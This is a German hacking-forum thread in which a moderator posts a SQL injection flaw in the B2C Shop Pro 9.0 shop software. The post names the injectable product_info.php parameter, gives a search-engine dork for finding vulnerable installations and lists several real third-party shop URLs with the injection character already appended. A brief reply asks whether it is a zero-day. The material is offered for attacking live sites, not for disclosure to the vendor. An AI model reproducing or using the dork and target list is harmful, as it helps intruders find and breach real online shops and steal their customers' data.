Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Sqli] Shop Pro 9.0 (DE cms)

- - - - -
Erstellt von CyberFlash ,

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
CyberFlash
Geschrieben 10 November 2019 - 04:39 Uhr

CyberFlash

    Moderator

  • Moderator
    • Likes
    119
  • 133 Beiträge
  • 43 Bedankt 
#Date 10.11.19

#Vuln : Sql Injection in B2C Shop Pro 9.0

#Vuln : /product_info.php?products_id=28[Inject Here]

#Vendor : https://www.store-systems.de

#Demo : http://www.store-systems.de/demoshops/testshop4/index.php

#Demo Vuln : www.store-systems.de/demoshops/testshop4/product_info.php?cPath=62&products_id=87'

#Dork : intext:Shopsoftware von store-systems.de | bisher die mmeisten Vulns


Bsp. Vuln's :



    https://www.customify.de/testshops/demo/product_info.php?products_id=40'&osCsid=448c9080b0e7c036c9f35f2e37d4c698

    https://www.bio-und-du.de/product_info.php?products_id=28'

    https://shop.delices.at/product_info.php?products_id=57'

Bearbeitet von CyberFlash, 10 November 2019 - 11:36 Uhr.

#2
samimedoaff
Geschrieben 11 November 2019 - 19:30 Uhr

samimedoaff

    Leecher

  • Members
  • PIP
    • Likes
    4
  • 0 Beiträge
  • 0 Bedankt

Ist das nen 0day? Dass sowas noch existiert .. Unter welchen Rechten läuft die Datenbank?


#3
CyberFlash
Geschrieben 11 November 2019 - 19:45 Uhr

CyberFlash

    Moderator

  • Moderator
    • Likes
    119
  • 133 Beiträge
  • 43 Bedankt

Ist das nen 0day? Dass sowas noch existiert .. Unter welchen Rechten läuft die Datenbank?

 

Ob diese Vuln schon einmal gefunden wurde weiss ich & kann ich nicht ausschliessen.

Laut google nein, aber nicht jeder macht sowas Pub. Auch wen es ein kleines Shops System ist.

Was die Rechte anbelangt würde ich sagen, das kommt darauf an wer das System eingerichtet hat :D

Das muss ja nicht überall das selbe sein...


Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 2 Mitglied(ern) gelesen


    Bot4ng, kiwitone
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking